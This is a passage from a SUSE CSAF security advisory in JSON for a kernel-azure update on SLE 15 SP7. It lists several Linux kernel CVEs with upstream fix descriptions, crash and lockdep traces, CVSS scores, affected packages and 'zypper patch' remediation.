"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68171"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix PTP cleanup on driver removal in error path\n\nImprove the cleanup on releasing PTP resources in error path.\nThe error case might happen either at the driver probe and PTP\nfeature initialization or on PTP restart (errors in reset handling, NVM\nupdate etc). In both cases, calls to PF PTP cleanup (ice_ptp_cleanup_pf\nfunction) and \u0027ps_lock\u0027 mutex deinitialization were missed.\nAdditionally, ptp clock was not unregistered in the latter case.\n\nKeep PTP state as \u0027uninitialized\u0027 on init to distinguish between error\nscenarios and to avoid resource release duplication at driver removal.\n\nThe consequence of missing ice_ptp_cleanup_pf call is the following call\ntrace dumped when ice_adapter object is freed (port list is not empty,\nas it is required at this stage):\n\n[ T93022] ------------[ cut here ]------------\n[ T93022] WARNING: CPU: 10 PID: 93022 at\nice/ice_adapter.c:67 ice_adapter_put+0xef/0x100 [ice]\n...\n[ T93022] RIP: 0010:ice_adapter_put+0xef/0x100 [ice]\n...\n[ T93022] Call Trace:\n[ T93022] \u003cTASK\u003e\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] ? __warn.cold+0xb0/0x10e\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] ? report_bug+0xd8/0x150\n[ T93022] ? handle_bug+0xe9/0x110\n[ T93022] ? exc_invalid_op+0x17/0x70\n[ T93022] ? asm_exc_invalid_op+0x1a/0x20\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] pci_device_remove+0x42/0xb0\n[ T93022] device_release_driver_internal+0x19f/0x200\n[ T93022] driver_detach+0x48/0x90\n[ T93022] bus_remove_driver+0x70/0xf0\n[ T93022] pci_unregister_driver+0x42/0xb0\n[ T93022] ice_module_exit+0x10/0xdb0 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n...\n[ T93022] ---[ end trace 0000000000000000 ]---\n[ T93022] ice: module unloaded",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
